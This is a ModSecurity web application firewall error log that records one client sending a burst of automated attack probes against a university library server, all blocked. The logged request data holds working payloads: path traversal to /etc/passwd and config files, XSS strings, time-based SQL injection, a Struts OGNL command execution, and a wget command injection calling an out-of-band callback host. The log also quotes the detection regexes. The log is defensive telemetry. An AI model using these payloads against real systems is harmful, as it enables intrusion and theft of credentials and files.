[Tue Aug 29 11:48:55.467880 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14t8Co-f0AAAfWN9EAAAAL"]
[Tue Aug 29 11:48:56.401571 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14uMCo-f0AAAl4sT0AAAAf"]
[Tue Aug 29 11:48:57.449257 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAkskuAAAAAN"]
[Tue Aug 29 11:48:57.474903 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAlFH7sAAAAk"]
[Tue Aug 29 11:48:57.476144 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAlQ3swAAAAw"]
[Tue Aug 29 11:48:58.391570 2023] [:error] [pid 2357] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14usCo-f0AAAk1w84AAAAY"]
[Tue Aug 29 11:49:02.369341 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gfg9t1rp1z5gt8.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAkwQUcAAAAS"]
[Tue Aug 29 11:49:04.471983 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAkqHvAAAAAM"]
[Tue Aug 29 11:49:05.408760 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAmG@rIAAAAy"]
[Tue Aug 29 11:49:08.393613 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAj12KYAAAAa"]
[Tue Aug 29 11:49:09.427487 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAhujEYAAAAr"]
[Tue Aug 29 11:49:09.503393 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xcCo-f0AAAjYrGoAAAAK"]
[Tue Aug 29 11:49:15.373127 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAlkwj0AAAAO"]
[Tue Aug 29 11:51:05.083464 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAl4sWMAAAAf"]
[Tue Aug 29 11:51:05.375466 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAl4sWgAAAAf"]
[Tue Aug 29 11:51:05.399031 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAknELoAAAAB"]
[Tue Aug 29 11:51:05.413352 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAlIBeAAAAAn"]
[Tue Aug 29 11:51:05.837086 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15OcCo-f0AAAlIBfAAAAAn"]
[Tue Aug 29 11:51:06.086530 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OsCo-f0AAAlIBfoAAAAn"]
[Tue Aug 29 11:51:08.597138 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAmHd8oAAAAz"]
[Tue Aug 29 11:51:08.691233 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAknENUAAAAB"]
[Tue Aug 29 11:51:09.540447 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAnEqS0AAAAO"]
[Tue Aug 29 11:51:09.579228 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAnHQdAAAAAT"]
[Tue Aug 29 11:51:10.722944 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAnDFx8AAAAM"]
[Tue Aug 29 11:51:11.567296 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAm80NwAAAAF"]
[Tue Aug 29 11:51:12.788057 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAmOBcoAAAAU"]
[Tue Aug 29 11:51:13.577538 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAhhc0IAAAAd"]
[Tue Aug 29 11:51:13.587739 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAm91mUAAAAG"]
[Tue Aug 29 11:51:13.693003 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAjdQTMAAAAZ"]
[Tue Aug 29 11:51:14.683380 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAhhc0UAAAAd"]
